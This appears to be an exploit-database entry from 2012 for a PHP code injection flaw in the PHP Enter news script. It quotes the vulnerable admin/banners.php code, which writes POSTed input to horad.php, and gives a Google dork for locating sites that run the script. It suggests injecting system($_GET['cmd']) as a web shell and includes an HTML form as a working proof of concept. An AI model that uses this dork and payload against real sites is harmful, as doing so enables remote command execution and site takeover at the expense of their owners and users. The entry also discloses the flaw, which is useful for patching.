PHP Enter Code Injection



EKU-ID: 2092 CVE: OSVDB-ID:
Author: L3b-r1'z Published: 2012-05-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


########################################################
#
# Exploit Title : Php Enter Php Code Injection
#
# Author        : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home          : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob        : http://L3b-r1z.com/
#
# Software Link : http://www.phpenter.net/
#
# Security Risk : High
#
# Version       : beta
#
# Tested on     : win\XP
#
# Dork          : allintext: "Powered by phpEnter.net"
#
# 1) Info Script
# 2) Info Vulnerability
# 3) P0c
#
########################################################
#
# 1) Info Script:
#
# PHP Enter is a free and Open Source PHP News Publishing script.
# It is an online news publishing system that features easy installation,
user submission.
# and an admin panel for adding, editing and removing categories and news.
########################################################
#
# 2) Info Vulnerability :
#
# This exploit allow attacker to inject php code execution like
system($_GET['cmd']);
# In file named banners in admin folder :
#
# 1. <?php
# 2. if(isset($_POST['submit']))
# 3. {
# 4. $ccode = $_POST['code'];
# 5.
# 6. $myFile="horad.php";
# 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD");
# 8. $stringData = "$ccode";
# 9. fwrite($fh, $stringData);
# 10. fclose($fh);
# 11. echo"<br /><center><font size=2
color=green>Successfully.</font></center>";
# 12. }else{
# 13. ?>
#
# Look to line 7 fopen MYFILE , $myfile="horad.php" or die can't open file
check chmod.
# fwrite FH variable and stringdata, So String Data doesn't secure :), can
attacker to inject php code execution.
# Look to line 4 : $_POST['code'];, attacker will inject in POST from any
tool dev, like HTTP LIVE EDITOR, HTTP Live headers.
#
#
#########################################################
#
#  3) p0c :
#
# <form method="post" action="http://localhost/admin/banners.php">
# <center>
# <font color=#3A586A>Code</font><br />
# <textarea name="code"></textarea>
# <br /><br />
# <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br
/>
# </form>
#
#########################################################
#
# Special Thx to : Irist.ir Team & Sec4ever.com Team
#
#########################################################
#
# Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech,
Damane2011
# Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07
M4S73R
# Ked-Ans, And All Members Of Irist And Sec4ever Team
#
#########################################################